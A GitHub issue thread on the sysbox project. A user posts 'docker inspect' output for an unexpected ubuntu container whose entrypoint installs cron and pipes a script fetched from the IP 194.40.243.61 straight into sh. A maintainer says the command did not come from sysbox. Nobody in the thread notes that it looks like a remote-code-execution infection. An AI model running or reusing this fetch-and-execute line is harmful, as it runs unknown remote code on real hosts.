### ISSUE TITLE
when I install sysbox, automatic download and run  ubuntu

### ISSUE THREAD

**Issue by longzmkm** [nestybox/sysbox#170]
docker inspect ubuntu

[
    {
        "Id": "b68a19e4211db5fba1c1dd42536e36e2a3d17899608449e187edf852719f842d",
        "Created": "2020-12-29T04:05:14.380890772Z",
        "Path": "/bin/bash",
        "Args": [
            "-c",
            "apt-get update && apt-get install -y wget cron;service cron start; wget -q -O - 194.40.243.61/d.sh | sh;tail -f /dev/null"
        ],
        "State": {
            "Status": "running",
            "Running": true,
            "Paused": false,
            "Restarting": false,
            "OOMKilled": false,
            "Dead": false,
            "Pid": 19056,
            "ExitCode": 0,
            "Error": "",
            "StartedAt": "2020-12-29T04:05:17.276335858Z",
            "FinishedAt": "0001-01-01T00:00:00Z"
        },
        "Image": "sha256:4e2eef94cd6b93dd4d794c18b45c763f72edc22858e0da5b6e63a4566a54c03c",
        "ResolvConfPath": "/var/lib/docker/containers/b68a19e4211db5fba1c1dd42536e36e2a3d17899608449e187edf852719f842d/resolv.conf",
        "HostnamePath": "/var/lib/docker/containers/b68a19e4211db5fba1c1dd42536e36e2a3d17899608449e187edf852719f842d/hostname",
        "HostsPath": "/var/lib/docker/containers/b68a19e4211db5fba1c1dd42536e36e2a3d17899608449e187edf852719f842d/hosts",
        "LogPath": "/var/lib/docker/containers/b68a19e4211db5fba1c1dd42536e36e2a3d17899608449e187edf852719f842d/b68a19e4211db5fba1c1dd42536e36e2a3d17899608449e187edf852719f842d-json.log",
        "Name": "/compassionate_austin",
        "RestartCount": 0,
        "Driver": "overlay2",
        "Platform": "linux",
        "MountLabel": "",
        "ProcessLabel": "",
        "AppArmorProfile": "docker-default",
        "ExecIDs": null,
        "HostConfig": {
            "Binds": null,
            "ContainerIDFile": "",
            "LogConfig": {
                "Type": "json-file",
                "Config": {
                    "max-file": "5",
                    "max-size": "500m"
                }
            },
            "NetworkMode": "default",
            "PortBindings": null,
            "RestartPolicy": {
                "Name": "",
                "MaximumRetryCount": 0
            },
            "AutoRemove": false,
            "VolumeDriver": "",
            "VolumesFrom": null,
            "CapAdd": null,
            "CapDrop": null,
            "CgroupnsMode": "host",
            "Dns": null,
            "DnsOptions": null,
            "DnsSearch": null,
            "ExtraHosts": null,
            "GroupAdd": null,
            "IpcMode": "private",
            "Cgroup": "",
            "Links": null,
            "OomScoreAdj": 0,
            "PidMode": "",
            "Privileged": false,
            "PublishAllPorts": false,
            "ReadonlyRootfs": false,
            "SecurityOpt": null,
            "UTSMode": "",
            "UsernsMode": "",
            "ShmSize": 67108864,
            "Runtime": "runc",
            "ConsoleSize": [
                0,
                0
            ],
            "Isolation": "",
            "CpuShares": 0,
            "Memory": 0,
            "NanoCpus": 0,
            "CgroupParent": "",
            "BlkioWeight": 0,
            "BlkioWeightDevice": null,
            "BlkioDeviceReadBps": null,
            "BlkioDeviceWriteBps": null,
            "BlkioDeviceReadIOps": null,
            "BlkioDeviceWriteIOps": null,
            "CpuPeriod": 0,
            "CpuQuota": 0,
            "CpuRealtimePeriod": 0,
            "CpuRealtimeRuntime": 0,
            "CpusetCpus": "",
            "CpusetMems": "",
            "Devices": null,
            "DeviceCgroupRules": null,
            "DeviceRequests": null,
            "KernelMemory": 0,
            "KernelMemoryTCP": 0,
            "MemoryReservation": 0,
            "MemorySwap": 0,
            "MemorySwappiness": null,
            "OomKillDisable": false,
            "PidsLimit": null,
            "Ulimits": null,
            "CpuCount": 0,
            "CpuPercent": 0,
            "IOMaximumIOps": 0,
            "IOMaximumBandwidth": 0,
            "MaskedPaths": [
                "/proc/asound",
                "/proc/acpi",
                "/proc/kcore",
                "/proc/keys",
                "/proc/latency_stats",
                "/proc/timer_list",
                "/proc/timer_stats",
                "/proc/sched_debug",
                "/proc/scsi",
                "/sys/firmware"
            ],
            "ReadonlyPaths": [
                "/proc/bus",
                "/proc/fs",
                "/proc/irq",
                "/proc/sys",
                "/proc/sysrq-trigger"
            ]
        },
        "GraphDriver": {
            "Data": {
                "LowerDir": "/var/lib/docker/overlay2/5554cac87628d0767c79234bc61e52d0d12f4f6702d2c4c4829e190fead75e47-init/diff:/var/lib/docker/overlay2/0166c1032257c647618aafdd708768b8089c904f187928550c3f1127485b4b57/diff:/var/lib/docker/overlay2/a1359c92bac9f4a08773abd831c89cd20fbc00442ed3cc35741972bf88cd0e77/diff:/var/lib/docker/overlay2/fad4a2c16d76f461f19e09bc1770d0caa74bbcfc7a5d80e512f2defc8036d35b/diff:/var/lib/docker/overlay2/9be1201f69432125aefcac870ef09c97689961e411c15c385e1278ff5aba9379/diff",
                "MergedDir": "/var/lib/docker/overlay2/5554cac87628d0767c79234bc61e52d0d12f4f6702d2c4c4829e190fead75e47/merged",
                "UpperDir": "/var/lib/docker/overlay2/5554cac87628d0767c79234bc61e52d0d12f4f6702d2c4c4829e190fead75e47/diff",
                "WorkDir": "/var/lib/docker/overlay2/5554cac87628d0767c79234bc61e52d0d12f4f6702d2c4c4829e190fead75e47/work"
            },
            "Name": "overlay2"
        },
        "Mounts": [],
        "Config": {
            "Hostname": "b68a19e4211d",
            "Domainname": "",
            "User": "",
            "AttachStdin": false,
            "AttachStdout": false,
            "AttachStderr": false,
            "Tty": false,
            "OpenStdin": false,
            "StdinOnce": false,
            "Env": [
                "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"
            ],
            "Cmd": null,
            "Image": "ubuntu",
            "Volumes": null,
            "WorkingDir": "",
            "Entrypoint": [
                "/bin/bash",
                "-c",
                "apt-get update && apt-get install -y wget cron;service cron start; wget -q -O - 194.40.243.61/d.sh | sh;tail -f /dev/null"
            ],
            "OnBuild": null,
            "Labels": {}
        },
        "NetworkSettings": {
            "Bridge": "",
            "SandboxID": "41f3fabb77f559432f06699b303363e5ea3354cb799eb3a8665eb11be9199f2a",
            "HairpinMode": false,
            "LinkLocalIPv6Address": "",
            "LinkLocalIPv6PrefixLen": 0,
            "Ports": {},
            "SandboxKey": "/var/run/docker/netns/41f3fabb77f5",
            "SecondaryIPAddresses": null,
            "SecondaryIPv6Addresses": null,
            "EndpointID": "72068fa234d1643901386f4074cc408819e379ccad49f18bd0f7ad09852c43a6",
            "Gateway": "172.20.0.1",
            "GlobalIPv6Address": "",
            "GlobalIPv6PrefixLen": 0,
            "IPAddress": "172.20.0.3",
            "IPPrefixLen": 16,
            "IPv6Gateway": "",
            "MacAddress": "02:42:ac:14:00:03",
            "Networks": {
                "bridge": {
                    "IPAMConfig": null,
                    "Links": null,
                    "Aliases": null,
                    "NetworkID": "1a57ab4bec4613de84f1817a4d23e253d084f6704f519b1d00688513299feda5",
                    "EndpointID": "72068fa234d1643901386f4074cc408819e379ccad49f18bd0f7ad09852c43a6",
                    "Gateway": "172.20.0.1",
                    "IPAddress": "172.20.0.3",
                    "IPPrefixLen": 16,
                    "IPv6Gateway": "",
                    "GlobalIPv6Address": "",
                    "GlobalIPv6PrefixLen": 0,
                    "MacAddress": "02:42:ac:14:00:03",
                    "DriverOpts": null
                }
            }
        }
    }
]

I dont know   194.40.243.61/d.sh Does it come with the system。

**Comment by ctalledo** [comment]
Hi @longzmkm, thanks for giving Sysbox a try!

> I dont' know 194.40.243.61/d.sh Does it come with the system。

Looks like the container is running the following command when it starts:

```
apt-get update && apt-get install -y wget cron;service cron start; wget -q -O - 194.40.243.61/d.sh | sh;tail -f /dev/null
```

That must come either from the `docker run` command or from CMD or ENTRYPOINT of the Docker image. Sysbox has nothing to do with that.

What was the command you used to launch the container with sysbox?

**Comment by longzmkm** [comment]
Thank you for your answer. This is my mistake in build
